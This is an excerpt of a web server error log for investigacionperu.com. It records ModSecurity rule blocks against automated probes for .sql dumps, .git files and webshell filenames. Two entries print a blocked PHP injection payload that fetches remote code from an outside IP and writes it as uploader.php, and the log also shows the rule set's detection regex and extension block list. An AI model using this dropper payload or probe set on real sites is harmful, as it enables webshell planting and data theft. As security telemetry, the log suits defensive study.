"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1234567890.sql"] [unique_id "ZRSTp8EnognafEpucaM-xAAAAAk"] 2023/09/28 00:44:24 [error] 26444#26444: *161489 access forbidden by rule, client: 145.40.126.125, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Sep 28 01:45:35.335451 2023] [:error] [pid 26482:tid 139941333870336] [client 185.162.16.58:59998] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/654321.sql"] [unique_id "ZRUhD8ayJaVuGd9wsCBTZAAAAJU"] [Thu Sep 28 03:28:29.037575 2023] [ssl:warn] [pid 26685:tid 140560009668480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:33.223354 2023] [ssl:warn] [pid 26688:tid 140560009668480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:33.736244 2023] [ssl:warn] [pid 26688:tid 140560009668480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:36.765955 2023] [ssl:warn] [pid 26688:tid 140560009668480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:39.100026 2023] [ssl:warn] [pid 27106:tid 139634895579008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:45.280336 2023] [ssl:warn] [pid 27108:tid 139634895579008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 28 03:28:46.318713 2023] [ssl:warn] [pid 27108:tid 139634895579008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/09/28 06:48:39 [error] 27230#27230: *165412 access forbidden by rule, client: 145.40.126.125, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Sep 28 07:06:10.653946 2023] [:error] [pid 27473:tid 139634445035264] [client 185.162.16.58:36290] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/pussy.sql"] [unique_id "ZRVsMmLfx-HtgqrXMgv7sAAAAVc"] [Thu Sep 28 12:39:35.045414 2023] [:error] [pid 27278:tid 139634712835840] [client 109.90.121.217:42392] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/superman.sql"] [unique_id "ZRW6Vw1n4JrbmWpgOCeJJwAAAEA"] [Thu Sep 28 17:45:29.165081 2023] [:error] [pid 27280:tid 139634587711232] [client 20.83.33.15:47890] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Sep 28 17:45:33.186526 2023] [:error] [pid 27279:tid 139634562533120] [client 20.83.33.15:47892] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Sep 29 03:13:19.844477 2023] [ssl:warn] [pid 8354:tid 140142270510976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 03:13:24.028719 2023] [ssl:warn] [pid 8356:tid 140142270510976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 03:13:24.569419 2023] [ssl:warn] [pid 8356:tid 140142270510976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 03:13:26.654590 2023] [ssl:warn] [pid 8356:tid 140142270510976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 03:13:28.912118 2023] [ssl:warn] [pid 8772:tid 140710266972032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 03:13:33.120575 2023] [ssl:warn] [pid 8773:tid 140710266972032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 29 04:16:58.901505 2023] [:error] [pid 8961:tid 140709839435520] [client 109.90.121.217:55714] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/fuckyou.sql"] [unique_id "ZRaWCltSGJPdN2xt8TmQWQAAANU"] [Fri Sep 29 09:25:59.845859 2023] [:error] [pid 8961:tid 140709873006336] [client 109.90.121.217:59544] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/121212.sql"] [unique_id "ZRbed1tSGJPdN2xt8TmSCgAAANE"] [Fri Sep 29 14:29:41.181146 2023] [:error] [pid 8797:tid 140709839435520] [client 118.163.251.59:38566] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/000000.sql"] [unique_id "ZRclpQiV5zcU58koAjIbHQAAAJU"] [Fri Sep 29 19:10:37.020974 2023] [:error] [pid 8795:tid 140709948540672] [client 43.130.241.222:43562] [client 43.130.241.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZRdnfb64-qfDg2q1KTFg3QAAAAg"], referer: www.google.com [Fri Sep 29 19:16:57.457745 2023] [:error] [pid 8961:tid 140709856220928] [client 163.172.67.65:43618] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Fri Sep 29 19:25:42.022734 2023] [:error] [pid 8796:tid 140709856220928] [client 185.162.16.58:43758] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/qazwsx.sql"] [unique_id "ZRdrBs4F1-KldsREbDdoHwAAAFM"] [Fri Sep 29 19:43:09.332664 2023] [:error] [pid 8796:tid 140709839435520] [client 163.172.67.65:44042] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Fri Sep 29 20:12:29.605031 2023] [:error] [pid 8961:tid 140709948540672] [client 163.172.67.65:44460] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Sat Sep 30 00:23:22.201983 2023] [:error] [pid 8797:tid 140709965326080] [client 75.41.146.98:47980] [client 75.41.146.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123qwe.sql"] [unique_id "ZRewygiV5zcU58koAjIdZAAAAIY"] 2023/09/30 00:35:53 [error] 8655#8655: *188439 access forbidden by rule, client: 45.135.57.32, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" [Sat Sep 30 03:31:23.990646 2023] [ssl:warn] [pid 18188:tid 139741908531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 30 03:31:28.173924 2023] [ssl:warn] [pid 18189:tid 139741908531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 30 03:31:28.598966 2023] [ssl:warn] [pid 18189:tid 139741908531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 30 03:31:30.968417 2023] [ssl:warn] [pid 18189:tid 139741908531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 30 03:31:34.626456 2023] [ssl:warn] [pid 18639:tid 140221470562176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 30 03:31:38.833027 2023] [ssl:warn] [pid 18641:tid 140221470562176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/09/30 04:10:20 [error] 18590#18590: *189732 access forbidden by rule, client: 43.202.43.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Sep 30 05:34:57.708079 2023] [:error] [pid 18663:tid 140221043615488] [client 89.234.148.96:51360] [client 89.234.148.96] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/killer.sql"] [unique_id "ZRf50SHf_8Dz5Fm9tLdlygAAAJU"] [Sat Sep 30 06:38:41.392136 2023] [autoindex:error] [pid 18663:tid 140221085579008] [client 65.21.224.105:51982] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sat Sep 30 06:38:44.559104 2023] [autoindex:error] [pid 18659:tid 140221052008192] [client 65.21.224.105:51986] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sat Sep 30 11:02:32.743207 2023] [:error] [pid 18662:tid 140221093971712] [client 182.215.164.33:55524] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/trustno1.sql"] [unique_id "ZRhGmF5ooCPKkkqah3i2SQAAAE8"] [Sat Sep 30 15:12:57.330875 2023] [:error] [pid 18663:tid 140221177898752] [client 43.133.194.67:58962] [client 43.133.194.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZRiBSSHf_8Dz5Fm9tLdnTwAAAIU"], referer: www.google.com [Sat Sep 30 16:25:31.764350 2023] [:error] [pid 19295:tid 140221060400896] [client 211.196.38.227:60322] [client 211.196.38.227] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/jordan.sql"] [unique_id "ZRiSS79qxGqk6q-sMiD2agAAANM"] [Sat Sep 30 21:47:37.506941 2023] [:error] [pid 19295:tid 140221085579008] [client 182.215.164.33:35386] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/jennifer.sql"] [unique_id "ZRjdyb9qxGqk6q-sMiD30wAAANA"] [Sun Oct 01 03:11:55.685641 2023] [:error] [pid 18663:tid 140221035222784] [client 211.196.38.227:40464] [client 211.196.38.227] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/zxcvbnm.sql"] [unique_id "ZRkpyyHf_8Dz5Fm9tLdqBQAAAJY"] [Sun Oct 01 03:34:33.721196 2023] [ssl:warn] [pid 30541:tid 139951390566272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 03:34:37.911941 2023] [ssl:warn] [pid 30543:tid 139951390566272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 03:34:38.186894 2023] [ssl:warn] [pid 30543:tid 139951390566272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 03:34:40.011537 2023] [ssl:warn] [pid 30543:tid 139951390566272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 03:34:42.312867 2023] [ssl:warn] [pid 30958:tid 140297298716544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 03:34:46.509483 2023] [ssl:warn] [pid 30961:tid 140297298716544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Oct 01 08:51:43.373606 2023] [:error] [pid 30980:tid 140296985769728] [client 182.215.164.33:43676] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/asdfgh.sql"] [unique_id "ZRl5b8ULyXBK43eADks8oAAAAIc"] [Sun Oct 01 14:35:30.080957 2023] [:error] [pid 31334:tid 140296843093760] [client 81.94.73.180:47112] [client 81.94.73.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] 